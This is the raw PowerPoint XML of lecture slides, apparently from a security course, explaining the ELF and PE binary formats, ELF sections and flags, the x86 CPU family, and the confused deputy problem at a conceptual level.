          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Executable and Linkable Format (ELF) is one of the most used binary object formats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ELF is architecture-independent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ELF files are of four types:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Relocatable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: need to be fixed by the linker before being executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Executable: ready for execution (all symbols have been resolved except for those related to shared libraries)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shared: shared libraries with the appropriate linking information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Core: core dumps created when a program terminated with a fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tools: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>readelf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack Bold"/>
              <a:cs typeface="Hack Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2828607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t>The ELF File Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995331" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="15430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Header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995332" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2114550"/>
            <a:ext cx="1676400" cy="8001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Program</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Header </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995333" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="29146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Segment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995335" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="13144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Magic number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995336" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="14859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Addressing info</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995337" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="16573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File type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995338" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="18288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Arch type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995339" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="20002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Entry point</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995340" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="21717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Program header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995341" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="23431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Section header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995342" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="25146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Header size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995343" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="1314450"/>
            <a:ext cx="457200" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995344" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="2057400" y="2114550"/>
            <a:ext cx="457200" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995345" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="34861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sz="1400">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995346" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="4229100"/>
            <a:ext cx="1676400" cy="6286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dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Section </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Header </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995347" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="3903761"/>
            <a:ext cx="313269" cy="307777"/>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sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995348" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2686050"/>
            <a:ext cx="1676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Size and number of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>entries in program header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995349" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="3086100"/>
            <a:ext cx="1676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Size and number of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>entries in section header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995393" name="Rectangle 65"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3486150"/>
            <a:ext cx="1676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Section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995394" name="Rectangle 66"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3714750"/>
            <a:ext cx="1676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Section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="995398" name="Text Box 70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A program is seen as a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>collection of segments by </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the loader and as a </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>collection of sections by the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>compiler/linker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A segment is usually made </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of several sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The segment structure is defined in the Program Header Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The section structure is defined in the Section Header Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="659778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7382" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>ELF Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="997383" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each section contains a header that specifies the type of section and the permissions (examples):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PROGBITS: Parts of the program, such as code and data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOBITS: Parts of the program that do not need space in the file, such as uninitialized data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SYMTAB and DYNSYM: Symbol tables for static and dynamic linking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>STRTAB: Tables used to to store strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REL and RELA: Sections that contain relocation information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The flag bits are (examples):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ALLOC: the section is allocated in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WRITE: the section is writable </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EXECINSTR: the section is executable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3149184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8404" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Typical ELF Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="998457" name="Group 57"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3670729844"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="1314450"/>
          <a:ext cx="8686800" cy="3123725"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="21717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71700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>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Name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Description</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Type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Flags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.text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the program’s code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 and EXECINSTR</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7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.data</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initialized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 and WRITE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6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.rodata</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read-only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.bss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uninitialized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NOBITS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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>ALLOC and WRITE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5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.init and .fini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pre and post code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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>ALLOC and EXECINSTR</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89714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en-US"/>
              <a:t>The PE File Format</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="993283" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PE file was introduced to allow MS-DOS programs to be larger than 64K (limit of .COM format) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also known as the “EXE” format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Programs are written as if they were always loaded at address 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The program is actually loaded in different points in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The header contains a number of relocation entries that are used at loading time to “fix” the addresses (this procedure is called “rebasing”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3738660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t>The x86 CPU Family</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1001475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8088, 8086</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>: 16-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>registers, real-mode only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Segment register is shifted and added to address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80286: 16-bit protected mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Segment register points to a segment descriptor (location, length, permissions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start of segment is added to address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80386: 32-bit registers, 32-bit protected mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80486/Pentium/Pentium Pro/MMX/II/III/4/Xeon: Extensions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AMD Opteron: 64-bit architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218825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356"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: The Confused Deputy Problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this attack pattern, an application is confused into performing a malicious action on behalf of an attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code and data flow are not modified</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The interaction leads the application into an unforeseen state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Malware component using the installed browser to download (malicious) artifacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20147063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(General Purpose)</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5" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6315035" y="2964042"/>
            <a:ext cx="9906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?H</a:t>
